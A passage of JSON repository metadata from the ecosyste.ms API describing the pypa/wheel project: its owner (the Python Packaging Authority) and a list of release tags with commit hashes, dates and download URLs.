:"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"pypa","name":"Python Packaging Authority","uuid":"647025","kind":"organization","description":"","email":"info@pypa.io","website":"https://www.pypa.io","location":"United States of America","twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/647025?v=4","repositories_count":58,"last_synced_at":"2025-10-30T00:34:30.821Z","metadata":{"has_sponsors_listing":true},"html_url":"https://github.com/pypa","funding_links":["https://github.com/sponsors/pypa"],"total_stars":88807,"followers":2132,"following":0,"created_at":"2022-11-02T16:21:37.826Z","updated_at":"2025-10-30T00:34:30.821Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/pypa","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/pypa/repositories"},"tags":[{"name":"0.46.1","sha":"7a0ea7f7c3dd73747e37368bb074cd0d9fb49259","kind":"commit","published_at":"2025-04-08T20:53:52.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.46.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.46.1/manifests"},{"name":"0.46.0","sha":"1da658384bbfc14c091085bb98828e68368a1ed5","kind":"commit","published_at":"2025-04-03T09:39:52.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.46.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.46.0/manifests"},{"name":"0.45.1","sha":"7855525de4093257e7bfb434877265e227356566","kind":"commit","published_at":"2024-11-23T00:14:12.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.45.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.45.1/manifests"},{"name":"0.45.0","sha":"d78f0e372199f8294556345d867af4d3cf118418","kind":"commit","published_at":"2024-11-08T21:40:06.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.45.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.45.0/manifests"},{"name":"0.44.0","sha":"7bb46d7727e6e89fe56b3c78297b3af2672bbbe2","kind":"commit","published_at":"2024-08-04T14:48:22.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.44.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.44.0/manifests"},{"name":"0.43.0","sha":"fa33dfd01fd665c1fd90097563b34bce4b5527ef","kind":"commit","published_at":"2024-03-11T19:28:01.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.43.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.43.0/manifests"},{"name":"0.42.0","sha":"63a09bb3d92630c1d35f4fcc6f79250256aeeb5c","kind":"commit","published_at":"2023-11-26T14:35:45.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.42.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.42.0/manifests"},{"name":"0.41.3","sha":"a899f1c69ffddf564b904a5de974457c213dc36a","kind":"commit","published_at":"2023-10-30T10:04:00.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.41.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.3/manifests"},{"name":"0.41.2","sha":"e76040b0d970a0fe6211c31888fc929078ba02d9","kind":"commit","published_at":"2023-08-22T09:29:26.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.41.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.2/manifests"},{"name":"0.41.1","sha":"b626a4a2ee6a887c7ad4b984fcb4d465dbfa337d","kind":"commit","published_at":"2023-08-05T13:31:27.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.41.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.1/manifests"},{"name":"0.41.0","sha":"95c2d83cde174ed3c34d5a5b53dc3b3a1ace91b6","kind":"commit","published_at":"2023-07-22T10:59:41.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.41.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.0/manifests"},{"name":"0.40.0","sha":"461f7a3a2d4824009ca4855b3300d61e6d405dc4","kind":"commit","published_at":"2023-03-14T14:38:44.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.40.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.40.0/manifests"},{"name":"0.38.4","sha":"814c2efe8e40051039c5a6de6945e04ecdd162ee","kind":"commit","published_at":"2022-11-09T20:33:01.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.38.4","html_url":"https://github.com/pypa/wheel/releases/tag/0.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.4/manifests"},{"name":"0.38.3","sha":"daeb157c8207b1459fc7baa5f234c165a7a5faf4","kind":"commit","published_at":"2022-11-08T17:46:24.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.38.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.3/manifests"},{"name":"0.38.2","sha":"44193907eb308930de05deed863fb4d157c5c866","kind":"commit","published_at":"2022-11-05T12:52:57.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.38.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.2/manifests"},{"name":"0.38.1","sha":"6f1608dc1a88f00d2390b9044bd655753f39234c","kind":"commit","published_at":"2022-11-04T09:09:25.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.38.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.1/manifests"},{"name":"0.38.0","sha":"fcb94cd51f7dfd40d88dff37415750d9e3638d3b","kind":"commit","published_at":"2022-10-20T21:19:31.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.38.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.0/manifests"},{"name":"0.37.1","sha":"c716c87ffa528ac9a31de3ed3217058848dc2cd2","kind":"commit","published_at":"2021-12-22T12:19:07.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.37.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.37.1/manifests"},{"name":"0.37.0","sha":"b8c4aa055cea0132776e7e53edce3538710d5b68","kind":"commit","published_at":"2021-08-09T20:44:19.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.37.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.37.0/manifests"},{"name":"0.36.2","sha":"4fb47f98550f3f43fc0b8c73f518592124ae21bd","kind":"commit","published_at":"2020-12-13T18:07:13.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.36.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.2/manifests"},{"name":"0.36.1","sha":"64550e15fdbc96d5690dc872257edc859c218068","kind":"commit","published_at":"2020-12-04T14:00:01.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.36.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.1/manifests"},{"name":"0.36.0","sha":"39b6397ba944d82f1fe37d043382f97b78a919d6","kind":"commit","published_at":"2020-12-01T08:52:46.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.36.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.0/manifests"},{"name":"0.35.1","sha":"bbc60829bea2eb25ccd236b9c6c16c9ee4f0d2ef","kind":"commit","published_at":"2020-08-14T19:22:54.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.35.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.35.1/manifests"},{"name":"0.35.0","sha":"4253bbb865823101d1a1757d12239fc74f49c4e7","kind":"commit","published_at":"2020-08-13T21:08:53.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.35.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.35.0/manifests"},{"name":"0.34.2","sha":"0036f80513457a95a309c81d8a63f113b52dbafa","kind":"commit","published_at":"2020-01-30T22:20:12.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.34.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.2/manifests"},{"name":"0.34.1","sha":"43078c409ebe9b7d5d70c2476fcb82055e8f0b97","kind":"tag","published_at":"2020-01-27T20:20:14.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.34.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.1/manifests"},{"name":"0.34.0","sha":"8b2312799f46359ac78f3b011dc758c45518e9e1","kind":"commit","published_at":"2020-01-27T08:21:26.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.34.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.0/manifests"},{"name":"0.33.6","sha":"b227ddd5beaba49294017d061d501f6d433393b0","kind":"commit","published_at":"2019-08-18T09:55:37.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.6","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.6/manifests"},{"name":"0.33.5","sha":"9ee9726620f80232ca49991dbeef83963d94482a","kind":"commit","published_at":"2019-08-17T16:13:24.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.5","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.5/manifests"},{"name":"0.33.4","sha":"882cd05d9bf4c4fc72568d806e227b5cf14df1d7","kind":"commit","published_at":"2019-05-11T21:41:35.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.4","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.4/manifests"},{"name":"0.33.3","sha":"7b782219d5322ee66cef293c5c5b49fbd4133a0d","kind":"commit","published_at":"2019-05-10T11:06:01.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.3/manifests"},{"name":"0.33.2","sha":"9534258081b4abf3af817dab976bc95ecc4bfa30","kind":"commit","published_at":"2019-05-09T08:18:30.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.2/manifests"},{"name":"0.33.1","sha":"c15924d80ed2235f277569d99bb9d80f59c9b19d","kind":"commit","published_at":"2019-02-19T14:03:57.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.1/manifests"},{"name":"0.33.0","sha":"bb54233a2dc855951fa40a48d5730c67f9d570c8","kind":"commit","published_at":"2019-02-12T06:58:33.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.0/manifests"},{"name":"0.32.3","sha":"11584b78a56b4eedba4eedc55c9dac8aa2dd7070","kind":"commit","published_at":"2018-11-19T00:16:37.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.32.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.3/manifests"},{"name":"0.32.2","sha":"3d3708c659f7b9988f958539e7748a1a01ee6e77","kind":"commit","published_at":"2018-10-20T20:03:14.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.32.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.2/manifests"},{"name":"0.32.1","sha":"e284ddf676adffa22f6d6a7b02be7328acfe23c4","kind":"commit","published_at":"2018-10-04T06:42:04.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.32.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.1/manifests"},{"name":"0.32.0","sha":"46e55b9bc7ac63d4c3a4dee706515968d58848ac","kind":"commit","published_at":"2018-09-29T15:36:41.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.32.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.0/manifests"},{"name":"0.31.1","sha":"3dc261abc98a5e43bc7fcf5783d080aaf8f9f0cf","kind":"commit","published_at":"2018-05-13T17:22:12.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.31.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.31.1/manifests"},{"name":"0.31.0","sha":"13d6ff3e8ef509b469d6bb6dd9cd8870ac3f2a16","kind":"commit","published_at":"2018-04-01T20:34:19.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.31.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.31.0/manifests"},{"name":"0.30.0","sha":"3c9cc212a76b334307985cebfa7ebf269a419223","kind":"commit","published_at":"2017-09-10T21:53:40.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.30.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.30.0/manifests"},{"name":"0.29.0","sha":"bc574d6ed73dabee02e4e00764172d6284a37cb4","kind":"commit","published_at":"2016-02-06T17:18:19.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.29.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.29.0/manifests"},{"name":"0.28.0","sha":"36997ae4545f3c876771a53f11ae4aa9127cabfe","kind":"commit","published_at":"2016-02-05T21:35:05.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.28.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.28.0/manifests"},{"name":"0.27.0","sha":"379fe05f71fc6144d5f58e582b6580339479e238","kind":"commit","published_at":"2016-02-05T16:38:24.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.27.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.27.0/manifests"},{"name":"0.26.0","sha":"acb3cf8177034c014cfe90a691a850b5322951b5","kind":"commit","published_at":"2015-09-18T18:04:37.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.26.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.26.0/manifests"},{"name":"0.25.0","sha":"4b9fd6bf095c1b4427ed65ac19e4d5666a719f33","kind":"commit","published_at":"2015-09-17T00:34:49.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.25.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.25.0/manifests"},{"name":"0.24.0","sha":"cd0935c4fe92a15ea83057a9357347ae8d6a138e","kind":"commit","published_at":"2014-07-06T16:56:09.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.24.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.24.0/manifests"},{"name":"0.23.0","sha":"75c59f175c8cb2bfcb6660927232b40df1e149c4","kind":"commit","published_at":"2014-04-01T02:01:41.000Z",